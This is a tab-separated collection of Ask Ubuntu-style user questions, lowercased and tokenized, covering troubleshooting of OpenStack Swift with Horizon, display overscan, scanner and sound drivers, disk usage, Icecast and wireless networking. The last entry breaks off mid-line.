505650	swift through horizon	deployed a single node swift , i.e. , containing both swift-proxy and swift-storage charms , in a multi-node openstack environment . here is my config file : swift-proxy : zone-assignment : 'manual' replicas : 1 swift-hash : 'fdfef9d4-8b06-11e2-8ac0-531c923c8fae' swift-storage : zone : 1 block-device : /etc/swift/storage.img|10g ( as this is an experimental setup , i do not require multiple replicas ) . after mounting storage.img on a loop device : /etc/swift/storage.img /srv/node/loop0 xfs loop , noatime , nodiratime , nobarrier , logbufs=8 0 0 and restarting swift services , i was able to upload and download files , as per http : //docs.openstack.org/icehouse/install-guide/install/apt/content/verify-object-storage-installation.html . currently , problem is that accessing swift from horizon , returns [ http/1.1 500 internal server error 49ms ] error , with `` something went wrong ! '' on /horizon/project/containers/ page . logs of apache server on horizon node , and syslog on swift node do not convey any useful messages : apache logs : ... 10.0.0.63 - - [ 01/aug/2014:22:47:46 +0000 ] `` get /horizon/project/containers/ http/1.1 '' 500 2205 `` https : //10.0.0.63/horizon/admin/ '' `` mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:31.0 ) gecko/20100101 firefox/31.0 '' ... swift logs : ... aug 1 22:52:11 node2 account-replicator : beginning replication run aug 1 22:52:11 node2 account-replicator : replication run over aug 1 22:52:11 node2 account-replicator : attempted to replicate 1 dbs in 0.00824 seconds ( 121.32638/s ) aug 1 22:52:11 node2 account-replicator : removed 0 dbs aug 1 22:52:11 node2 account-replicator : 0 successes , 0 failures aug 1 22:52:11 node2 account-replicator : no_change:0 ts_repl:0 diff:0 rsync:0 diff_capped:0 hashmatch:0 empty:0 aug 1 22:52:27 node2 object-replicator : starting object replication pass . aug 1 22:52:27 node2 object-replicator : 1/1 ( 100.00 % ) partitions replicated in 0.00s ( 274.28/sec , 0s remaining ) aug 1 22:52:27 node2 object-replicator : 1 suffixes checked - 0.00 % hashed , 0.00 % synced aug 1 22:52:27 node2 object-replicator : partition times : max 0.0008s , min 0.0008s , med 0.0008s aug 1 22:52:27 node2 object-replicator : object replication complete . ( 0.00 minutes ) aug 1 22:52:39 node2 container-replicator : beginning replication run aug 1 22:52:39 node2 container-replicator : replication run over aug 1 22:52:39 node2 container-replicator : attempted to replicate 1 dbs in 0.00803 seconds ( 124.54721/s ) aug 1 22:52:39 node2 container-replicator : removed 0 dbs aug 1 22:52:39 node2 container-replicator : 0 successes , 0 failures aug 1 22:52:39 node2 container-replicator : no_change:0 ts_repl:0 diff:0 rsync:0 diff_capped:0 hashmatch:0 empty:0 aug 1 22:52:40 node2 object-auditor : begin object audit `` forever '' mode ( zbf ) aug 1 22:52:40 node2 object-auditor : begin object audit `` forever '' mode ( all ) aug 1 22:52:40 node2 object-auditor : object audit ( zbf ) `` forever '' mode completed : 0.00s . total quarantined : 0 , total errors : 0 , total files/sec : 639.38 , total bytes/sec : 0.00 , auditing time : 0.00 , rate : 0.63 aug 1 22:52:40 node2 object-auditor : object audit ( all ) `` forever '' mode completed : 0.01s . total quarantined : 0 , total errors : 0 , total files/sec : 77.42 , total bytes/sec : 14090.95 , auditing time : 0.01 , rate : 0.96 aug 1 22:52:40 node2 object-auditor : begin object audit `` forever '' mode ( zbf ) aug 1 22:52:40 node2 object-auditor : object audit ( zbf ) `` forever '' mode completed : 0.00s . total quarantined : 0 , total errors : 0 , total files/sec : 623.87 , total bytes/sec : 0.00 , auditing time : 0.00 , rate : 0.66 aug 1 22:52:40 node2 container-updater : begin container update sweep aug 1 22:52:40 node2 container-updater : container update sweep completed : 0.05s aug 1 22:52:41 node2 account-replicator : beginning replication run aug 1 22:52:41 node2 account-replicator : replication run over aug 1 22:52:41 node2 account-replicator : attempted to replicate 1 dbs in 0.00801 seconds ( 124.78064/s ) aug 1 22:52:41 node2 account-replicator : removed 0 dbs aug 1 22:52:41 node2 account-replicator : 0 successes , 0 failures aug 1 22:52:41 node2 account-replicator : no_change:0 ts_repl:0 diff:0 rsync:0 diff_capped:0 hashmatch:0 empty:0 aug 1 22:52:57 node2 object-replicator : starting object replication pass . aug 1 22:52:57 node2 object-replicator : 1/1 ( 100.00 % ) partitions replicated in 0.00s ( 274.42/sec , 0s remaining ) aug 1 22:52:57 node2 object-replicator : 1 suffixes checked - 0.00 % hashed , 0.00 % synced aug 1 22:52:57 node2 object-replicator : partition times : max 0.0009s , min 0.0009s , med 0.0009s aug 1 22:52:57 node2 object-replicator : object replication complete . ( 0.00 minutes ) aug 1 22:53:09 node2 container-replicator : beginning replication run aug 1 22:53:09 node2 container-replicator : replication run over aug 1 22:53:09 node2 container-replicator : attempted to replicate 1 dbs in 0.00786 seconds ( 127.24117/s ) aug 1 22:53:09 node2 container-replicator : removed 0 dbs aug 1 22:53:09 node2 container-replicator : 0 successes , 0 failures aug 1 22:53:09 node2 container-replicator : no_change:0 ts_repl:0 diff:0 rsync:0 diff_capped:0 hashmatch:0 empty:0 aug 1 22:53:10 node2 object-auditor : begin object audit `` forever '' mode ( zbf ) aug 1 22:53:10 node2 object-auditor : begin object audit `` forever '' mode ( all ) aug 1 22:53:10 node2 object-auditor : object audit ( zbf ) `` forever '' mode completed : 0.00s . total quarantined : 0 , total errors : 0 , total files/sec : 283.05 , total bytes/sec : 0.00 , auditing time : 0.00 , rate : 0.68 aug 1 22:53:10 node2 object-auditor : object audit ( all ) `` forever '' mode completed : 0.01s . total quarantined : 0 , total errors : 0 , total files/sec : 84.08 , total bytes/sec : 15301.85 , auditing time : 0.01 , rate : 0.89 aug 1 22:53:10 node2 object-auditor : begin object audit `` forever '' mode ( zbf ) aug 1 22:53:10 node2 object-auditor : object audit ( zbf ) `` forever '' mode completed : 0.00s . total quarantined : 0 , total errors : 0 , total files/sec : 714.90 , total bytes/sec : 0.00 , auditing time : 0.00 , rate : 0.64 ... it should be noted that for swift cli to work properly , i have to use the `` -- insecure '' option , otherwise ssl verification fails , e.g , issuing swift -- debug -v -v 2.0 list : ... debug : iso8601.iso8601 : got u'00 ' for 'hour ' with default none debug : iso8601.iso8601 : got u'01 ' for 'minute ' with default none debug : iso8601.iso8601 : got u'35 ' for 'second ' with default none info : urllib3.connectionpool : starting new https connection ( 1 ) : 10.0.0.59 [ errno 1 ] _ssl.c:510 : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed where 10.0.0.59 is the address of swift node ; however , with `` -- insecure '' option : ... debug : iso8601.iso8601 : got u'03 ' for 'minute ' with default none debug : iso8601.iso8601 : got u'37 ' for 'second ' with default none info : urllib3.connectionpool : starting new https connection ( 1 ) : 10.0.0.59 debug : urllib3.connectionpool : setting read timeout to < object object at 0x7feea6bd2090 > debug : urllib3.connectionpool : '' get /v1/auth_9b508c0ebfb144b596034b3c99cbfcad ? format=json http/1.1 '' 200 46 debug : swiftclient : req : curl -i https : //10.0.0.59:8080/v1/auth_9b508c0ebfb144b596034b3c99cbfcad ? format=json -x get -h `` x-auth-token : 3161ab12fd4545888e0c42365480e310 '' debug : swiftclient : resp status : 200 ok debug : swiftclient : resp headers : [ ( 'content-length ' , '46 ' ) , ( 'accept-ranges ' , 'bytes ' ) , ( 'server ' , 'apache/2.4.7 ( ubuntu ) ' ) , ( 'x-timestamp ' , '1406848229.54726 ' ) , ( 'x-trans-id ' , 'tx50a3a1d09ae145958a6bb-0053dc1cc9 ' ) , ( 'date ' , 'fri , 01 aug 2014 23:03:38 gmt ' ) , ( 'x-account-bytes-used ' , '182 ' ) , ( 'x-account-container-count ' , '1 ' ) , ( 'content-type ' , 'application/json ; charset=utf-8 ' ) , ( 'x-account-object-count ' , '1 ' ) ] debug : swiftclient : resp body : [ { `` count '' : 1 , `` bytes '' : 182 , `` name '' : `` myfile '' } ] myfile info : urllib3.connectionpool : starting new https connection ( 1 ) : 10.0.0.59 debug : urllib3.connectionpool : setting read timeout to < object object at 0x7feea6bd2090 > debug : urllib3.connectionpool : '' get /v1/auth_9b508c0ebfb144b596034b3c99cbfcad ? format=json & marker=myfile http/1.1 '' 200 2 debug : swiftclient : req : curl -i https : //10.0.0.59:8080/v1/auth_9b508c0ebfb144b596034b3c99cbfcad ? format=json & marker=myfile -x get -h `` x-auth-token : 3161ab12fd4545888e0c42365480e310 '' debug : swiftclient : resp status : 200 ok debug : swiftclient : resp headers : [ ( 'content-length ' , '2 ' ) , ( 'accept-ranges ' , 'bytes ' ) , ( 'server ' , 'apache/2.4.7 ( ubuntu ) ' ) , ( 'x-timestamp ' , '1406848229.54726 ' ) , ( 'x-trans-id ' , 'txd1d511e7f45648338a4a8-0053dc1cca ' ) , ( 'date ' , 'fri , 01 aug 2014 23:03:38 gmt ' ) , ( 'x-account-bytes-used ' , '182 ' ) , ( 'x-account-container-count ' , '1 ' ) , ( 'content-type ' , 'application/json ; charset=utf-8 ' ) , ( 'x-account-object-count ' , '1 ' ) ] debug : swiftclient : resp body : [ ] current list is returned . i am not sure if the 2 are related , but seem plausible . would appreciate any help .
505651	ubuntu detect my new display and i lost all around my working screen	i recently changed my display to a new one . ( it is a tv used as monitor too . ) ubuntu detected it correctly as a 40 inch tv . but on any program that i open , i lose the view of all edges of the screen , even on my working window . i can not even see the unity launcher . for example if i open firefox , i can not see the top horizontal tap ( file.edit , history , bookmarks , etc . ) , they are there , and working , but i click on them by guess.. same thing on bottom of screen and on laterals too . i can not see the edges around them . how can i solve this problem ? it was ok before , until my other tv suddenly broke and i bought the new one .
505652	ca n't get epson perfection v500 drivers to work	i 'm an absolute beginner to ubuntu ( having at last broken the chains of xp ! ! ) but i 'm struggling with a lot of things as i lack the basic 'language ' skills you all seem to use ; but here goes : i dutifully followed the instructions given on nov 15 '12 by `` user 76204 '' in an effort to get my scanner going . the instructions are clear and simple [ i updated to allow for 14.04 / 32 bit ] and installed the following packages all in the right order [ several times ] : iscan-data_1.29.02_all.deb iscan2.29.3-1~usbo.1.ltdl7_i386.deb iscan-plugin etc rebooted system ... ... . nothing happens ... .. no scanner/no nothing . any help will inspire incredible gratitude as i 'm beginning to think i may have made a big mistake and that linux is for you pro 's and not the likes of me ... .. but i 'endeavour to persevere' thanx in advance baz .
505656	sound not working - possibly sound driver ?	i was sick of my windows xp computer , so i upgraded to ubuntu . i know nothing about ubuntu , i have been with windows all my life . for some reason , my sound is not working ... i have never heard sound come from the new ubuntu os on my pc . i think it may be the sound driver . how do i update my sound card driver ? or get my sound to work ? i can provide as much information as you need , please help . thanks ! update ok i tried your method , and it gives me this : ( root @ garlotch-linux : /home/garlotch # sudo apt-get install build-essential linux-headers- 'uname -r ' alsa-base alsa-firmware-loaders alsa-oss alsa-source alsa-tools alsa-tools-gui alsa-utils alsamixergui reading package lists ... done building dependency tree reading state information ... done virtual packages like 'linux-headers ' ca n't be removed e : unable to locate package uname -r
505660	editing max_brightness	is it possible to edit the value in /sys/class/brightness/acpi_video0/max_brightness/ ? i 've tried : sudo echo 16 > max_brightness from the directory , but i 'm getting permission denied the current value is 15 . is this the actual hardware limit ? or is this what ubuntu believes to be the limit .
505661	how to upgrade from ubuntu 14.04 lts to ubuntu 14.04.1 lts ?	how to upgrade from ubuntu 14.04 lts to ubuntu 14.04.1 lts ? after running software updater also , it is not getting updated .
505662	is a ubuntu livecd technically a virtual machine ?	i just booted into my school 's computer using a ubuntu install disk . it might not seem that hard but it 's a technical school and they have them pretty locked down , maybe not for you but for me it is locked down . i am graduating in a few weeks so i am going to take advantage of this as much as i can . i thought if anyone asks i will just tell them its a vm for some class and that got me thinking . is a live cd technically a vm ? i mean it is not technically installed on this computer . so it 's virtual , right ? second question ... what should i do ?
505663	experience minor graphical issues when i interact with my gui	i 'm completely new to ubuntu do please bear with me . : ) i 've just installed ubuntu 14.04.1 lts 64-bit on my ssd and it all seemed to go well . during the test when i was running it from my pendrive , the interface did n't seem to have any problems ( i 'm fairly certain anyway ) , but when i installed it on my ssd and restarted it started having a few graphical glitches . namely , an issue with mouse trailing and leaving behind fragments of ghost cursor all around the screen . although , ui elements seem to only update when the cursor is placed directly over them in a sort of square shaped area . i 'm not entirely sure if this is to do with my graphics drivers . aalthough i am using the recommended graphics drivers and have tried other suggested drivers , although this does n't seem to have made any difference . does this sound like it could be a support issue with my graphics card or could it be unrelated ? i have a sapphire dual-x r9 280x graphics card . any advice would be much appreciated .
505669	hdd 46g used per gparted and df - but only 10g per ncdu , du , baobab etc ubuntu 12.04lts	good day . i have ubuntu 12.04 lts running a headless nas box ( hp microserver ) - used mainly for backup , but it also runs plex media server . plex stopped working and it turned out i was out of disk space . i have cleared out some old kernel versions so have retrieved a little space and plex is working now . however , i ca n't identify what is using the extra 36g of space . i would like to clear the space and avoid rebuilding the machine . df -h says 46g used and 98 % full ( which is consistent with the gparted usage ) - filesystem size used avail use % mounted on /dev/sda4 50g 46g 1.4g 98 % / but du -xhs says 9.5g used - sudo du -xhs / 9.5g / ncdu and disk usage analyzer ( baobab ) also show 9.5gb - so they do n't show what is using the space ( /mnt and /media excluded as they are where my backups are mounted and are tb 's in size ) sudo ncdu -- exclude /mnt -- exclude /media / 1.9gib [ # # ] /usr 1.1gib [ # ] /home 447.6mib [ ] /lib 75.9mib [ ] /boot 9.5mib [ ] /sbin 9.0mib [ ] /etc 8.8mib [ ] /bin 4.0mib [ ] /run 104.0kib [ ] /root 36.0kib [ ] /tmp e 16.0kib [ ] /lost+found 4.0kib [ ] /dev 4.0kib [ ] /lib64 e 4.0kib [ ] /srv e 4.0kib [ ] /selinux e 4.0kib [ ] /opt e 4.0kib [ ] /cdrom . 0.0 b [ ] /proc 0.0 b [ ] /sys @ 0.0 b [ ] initrd.img.old @ 0.0 b [ ] vmlinuz.old < 0.0 b [ ] /mnt < 0.0 b [ ] /media it does n't seem to be due to open deleted files as sudo lsof | grep deleted shows - init 1 root 8w reg 8,4 500 148491 /var/log/upstart/dbus.log.1 ( deleted ) init 1 root 10w reg 8,4 55813 130877 /var/log/upstart/plexmediaserver.log.1 ( deleted ) init 1 root 16w reg 8,4 4216 133683 /var/log/upstart/modemmanager.log.1 ( deleted ) python 9313 plex 8u reg 8,4 4096 1700647 /tmp/ffifxf1zy ( deleted ) according sudo find / -xdev -type f -size +10000c -ls | sort -nrk 7,7 | head the largest files are listed as - 785629 922356 -rw-r -- r -- 1 plex plex 944477783 jul 31 23:47 /var/lib/plexmediaserver/library/application\ support/plex\ media\ server/cache/transcode/sync/2428339/2831927/bd789647083c9472caf0.mp4 1346177 850528 -rw-r -- r -- 1 plex plex 870935793 may 4 03:20 /var/lib/plexmediaserver/library/application\ support/plex\ media\ server/metadata/tv\ shows/b/aeae4285550087f5d22a9030c7d5d69a7196b87.bundle/contents/com.plexapp.agents.localmedia/posters/8e453437ed057792cf502dfb3e43821df94d3b3a 1056823 850528 -rw-r -- r -- 1 plex plex 870935793 may 4 03:20 /var/lib/plexmediaserver/library/application\ support/plex\ media\ server/metadata/tv\ shows/b/aeae4285550087f5d22a9030c7d5d69a7196b87.bundle/contents/_stored/posters/com.plexapp.agents.localmedia_8e453437ed057792cf502dfb3e43821df94d3b3a 132188 313416 -rw-r -- r -- 1 plex plex 320929896 aug 2 10:36 /var/lib/plexmediaserver/library/application\ support/plex\ media\ server/logs/plex\ media\ server.log 398237 254660 -rw-r -- r -- 1 ben ben 260765696 jul 31 23:06 /home/ben/.dropbox/instance1/filecache.dbx 392538 30672 -rw -- -- -- - 1 ben ben 252788736 may 9 21:59 /home/ben/core 141515 194704 -rw-r -- -- - 1 syslog adm 199372800 jul 27 08:04 /var/log/mail.log.1 141514 189032 -rw-r -- -- - 1 syslog adm 193562231 aug 2 10:40 /var/log/mail.log 141340 135192 -rw-r -- -- - 1 syslog adm 138432512 jul 27 08:04 /var/log/mail.err.1 140800 132400 -rw-r -- -- - 1 syslog adm 135570264 aug 2 10:40 /var/log/mail.err rebooting makes no difference - i have done so a number of times . any ideas ? thanks ben
505670	will this kernel fork work on 14.04 ?	will this http : //www.webupd8.org/2013/05/get-better-linux-desktop-performance.html work on 14.04 trusty ?
505674	creating a command to load a shell script from command line	right now when i want to run a specific program , i perform the following task : cd ~/downloads ~/downloads $ cd rubymine-6.3.3 ~/downloads/rubymine-6.3.3 $ cd bin ./rubymine.sh instead of doing all that , i would like to say `` mine '' from the command line and have it load as it does above . $ echo $ path $ cd ~/bin $ ln -s /home/myuser/downloads/rubymine-6.3.3/bin/rubymine.sh ~/bin $ cd ~/bin & & ls -l | grep rubymine.sh rubymine.sh - > /home/myuser/downloads/rubymine-6.3.3/bin/rubymine.sh $ cd ~/bin & & ./rubymine.sh this is the part i want to convert into a command : `` cd ~/bin & & ./rubymine.sh '' . any idea how ?
505675	put crossdomain.xml into icecast2 webroot	i 'm trying to put a crossdomain.xml file inside icecast2 web root to be able to access by the flash player http : //mydomain.com:8000/crossdomain.xml i 'm frustrated now . tried everything possible but can not access file from a outside browser . getting this error the file you requested could not be found changed file permissions and everything . but no luck . even i renamed existing css file just to see if i can access it outside . i can see original file but after renaming i cant even access that css file . what is going on . permission issue ? please help . i cant stream ogg without that flash policy file . my icecast version is 2.3.3
505678	synaptic installation problem ubuntu 12.10 ?	i 'm not able to install synaptic , please help me . jhon @ jhon-inspiron-n5010 : ~ $ sudo apt-get install synaptic [ sudo ] password for jhon : reading package lists ... done building dependency tree reading state information ... done package synaptic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'synaptic ' has no installation candidate
505681	unity - how to detect if the screen is locked ?	both of these only work after the screen that was locked gets blanked ; but they sometimes fail also , when for any reason the screen doesnt blanks ... gnome-screensaver-command -- query gnome-screensaver-command -- time i tried with qdbus also : qdbus org.gnome.screensaver /org/gnome/screensaver org.gnome.screensaver.getactivetime but it equally failed . i just found that who actually locks the screen is unity ! qdbus com.canonical.unity /com/canonical/unity/session com.canonical.unity.session.lock related questions : http : //unix.stackexchange.com/questions/28181/run-script-on-screen-lock-unlock http : //unix.stackexchange.com/questions/80143/how-to-create-a-daemon-which-would-be-listening-to-dbus-and-fire-script-on-messa
505682	my internet is slow since i installed ubuntu	i am an inexperienced ubuntu user . since i installed ubuntu my internet connection on this computer has become too slow . sometimes the internet connection gets disconnected or videos load slowly . here is my wireless information : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux andres-hp-14-notebook-pc 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 07 ) subsystem : hewlett-packard company device [ 103c:218d ] kernel driver in use : r8169 03:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:197d ] kernel driver in use : rtl8188ee # # # # # lsusb # # # # # bus 002 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 004 : id 04f2 : b40d chicony electronics co. , ltd bus 001 device 003 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 001 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # lsmod # # # # # rtl8188ee 89677 0 rtl_pci 26690 1 rtl8188ee rtlwifi 63475 2 rtl_pci , rtl8188ee mac80211 630653 3 rtl_pci , rtlwifi , rtl8188ee cfg80211 484040 2 mac80211 , rtlwifi # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : '' janet pc '' mode : managed frequency:2.462 ghz access point : < mac address removed > bit rate=150 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=70/70 signal level=-14 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:5 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.2 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 search espol.edu.ec # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : wlan0 [ janet pc ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8188ee state : connected default : yes hw address : < mac address removed > capabilities : speed : 150 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) riofrio : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 27 wpa wpa2 lorences cardenas : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 100 wpa wpa2 tvcable carlos : infra , < mac address removed > , freq 2452 mhz , rate 54 mb/s , strength 54 wpa wpa2 familia velasquez : infra , < mac address removed > , freq 2437 mhz , rate 48 mb/s , strength 60 wep zyxel : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 60 zhirzhan azanza : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 27 wpa2 red barrezueta : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 100 wpa *janet pc : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 74 wpa wpa2 ipv4 settings : address : 192.168.1.104 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.2 dns : 192.168.1.2 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq no-auto-default= < mac address removed > , [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=64/70 signal level=-46 dbm encryption key : on essid : '' janet pc '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000000f53f342 extra : last beacon : 4ms ago ie : unknown : 00084a414e4554205043 ie : unknown : 010882848b960c121824 ie : unknown : 03010b ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : wpa version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : dd180050f2020101850003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c334e111bff00000000000000000000000000000000000000000000 ie : unknown : 2d1a4e111bff00000000000000000000000000000000000000000000 ie : unknown : dd1a00904c340b0f0800000000000000000000000000000000000000 ie : unknown : 3d160b0f0800000000000000000000000000000000000000 ie : unknown : dd0900037f01010000ff7f ie : unknown : dd0a00037f04010000004000 ie : unknown : dd850050f204104a0001101044000102103b0001031047001000000000000010000000f8d1114c7eec1021000754502d4c494e4b10230009544c2d57523734304e10240007312e302f322e3010420003312e301054000800060050f204000110110019576972656c65737320526f7574657220544c2d57523734304e100800020086103c000101 cell 02 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=48/70 signal level=-62 dbm encryption key : on essid : '' lorences cardenas '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000092627030f extra : last beacon : 4ms ago ie : unknown : 00114c4f52454e4345532043415244454e4153 ie : unknown : 010882848b960c121824 ie : unknown : 03010b ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : dd180050f2020101850003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c334e111bff00000000000000000000000000000000000000000000 ie : unknown : 2d1a4e111bff00000000000000000000000000000000000000000000 ie : unknown : dd1a00904c340b0f0a00000000000000000000000000000000000000 ie : unknown : 3d160b0f0a00000000000000000000000000000000000000 ie : unknown : dd0900037f01010000ff7f ie : unknown : dd0a00037f04010000004000 ie : unknown : dd850050f204104a0001101044000102103b0001031047001000000000000010000000f8d1114c58d01021000754502d4c494e4b10230009544c2d57523734304e10240007312e302f322e3010420003312e301054000800060050f204000110110019576972656c65737320526f7574657220544c2d57523734304e100800020086103c000101 # # # # # iwlist channel # # # # # wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz current frequency:2.462 ghz ( channel 11 ) # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl8188ee/rtl8188ee.ko firmware : rtlwifi/rtl8188efw.bin description : realtek 8188e 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : zhiyuan_yang < zhiyuan_yang @ realsil.com.cn > srcversion : fa356d8efd887b567263405 alias : pci : v000010ecd00008179sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , mac80211 intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :65:43:53:5f : a2 : bb:5b:70:9e:84 : f1:6d : a7 : c7 sig_hashalgo : sha512 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : msi : set to 1 to use msi interrupts mode ( default 0 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko description : pci basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : d5e4890dc428fa5a1bf92df depends : mac80211 , rtlwifi intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :65:43:53:5f : a2 : bb:5b:70:9e:84 : f1:6d : a7 : c7 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : e1f4663325225ee8dba54ca depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :65:43:53:5f : a2 : bb:5b:70:9e:84 : f1:6d : a7 : c7 sig_hashalgo : sha512 # # # # # modules # # # # # lp rtc -- -- -- -- -- # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x10ec:0x8136 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8179 ( rtl8188ee ) subsystem== '' net '' , action== '' add '' , drivers== '' 